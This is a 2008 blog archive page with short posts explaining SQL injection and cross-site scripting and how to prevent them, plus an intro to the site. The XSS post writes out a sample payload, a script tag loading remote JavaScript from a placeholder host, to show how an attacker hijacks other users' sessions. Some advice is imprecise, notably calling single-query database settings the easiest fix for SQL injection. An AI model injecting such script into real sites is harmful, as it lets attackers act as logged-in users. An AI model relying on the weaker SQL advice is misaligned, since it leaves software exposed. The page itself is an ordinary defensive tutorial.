Archive

Archive for December, 2008

So, what is SQL Injection and how do I stop it?

December 29th, 2008 No comments

SQL injection is bad…  There are a number of causes, put most simply it is when you don’t use sql properly.  How do you prevent it?  There are several approaches, the absolute easiest is to configure your database to never allow more than one query per call.  Most hosting poviders do this already.  The other is to use an ORM and never ever compose sql queries from user input without using bind paramaters…  (While using an ORM isn’t required to prevent sql injection using one makes the whole world go round better, so just bite the learning curve bullet and use one.  Your productivity will go up atleast 100%)

xkcd has a wonderful commic that illustrates how sql injection takes place: http://xkcd.com/327/

Categories: Uncategorized Tags:

So, “XSS Attacks” What are they and how do I prevent them?

December 29th, 2008 No comments

XSS means “Cross Site Scripting”. XSS Attacks happen whenever a user of a website posts malicious content that gets executed by other users as javascript. Pretty simple huh? How do you avoid it? It is a piece of cake. HTML entity encode ALL user generated content before presenting it to a user.  It’s that simple.  How do I do that you ask?  Keep reading.

First, an example. You run a simple blog. When a user posts comments, you store the users nickname, and display it next to their comment… A malicious user enters the following for his nickname “<script src=”http://lolcatz/hack.js”></script>” Now, obviously that isn’t his nickname. Instead, it is an html tag that tells a web browser to load and run the script contained at http://lolcatz.com/hacks/getacheezeburger.js. What does this script do?? This script can do anything on your site that a logged in user can do. So Bob creates the malicious comment, and then jimmy comes by your site, views your article, and his browser gets Bob’s malicious script tag. Now, the script can do anything it wants on your site while pretending to be jimmy, not Bob.

In php, just enclose the variable you are printing with echo with: htmlentities($nickname);  This converts <‘s to &lt; and “‘s to &qt; .  This defangs the malicious content.  Instead of your users browser seeing a script tag, it just sees html that when rendered appears to the user as a script tag, but doesn’t do anything.  You need to do this each and EVERY time you print user generated content.  The other option is to find some script that will parse through any user generated content and strip out any script tags, but I prefer just html encoding everything.

Categories: Uncategorized Tags:

So, you want a blink tag right?

December 29th, 2008 No comments

Remember the good old days of the internet? HTML just hit 2.0, making a site cross browser compatible meant putting Comment tags around javascript code… XSS didn’t exist. PERL was your only CGI option. There was a wonderful site back then called htmlgoodies.com. Articles were written to be humerous yet informative. And every article started with “So, you want (insert html / javascript thing here) huh?” Then something happened. Someone bought htmlgoodies.com (Either that or the Author got hi) and the quality went down the tubes. The site got ugly. I mean UGLY. Well, a lot has happened since then. The technologies eveolved rapidly. So much so, that today, to leverage the web, it isn’t so much about knowing the ins and outs of each technology, but rather knowing about patters, and available building blocks that you can plug-in where you want to achieve your goals. This site is dedicated to showing you some of these building blocks and how to use them.

Categories: Uncategorized Tags: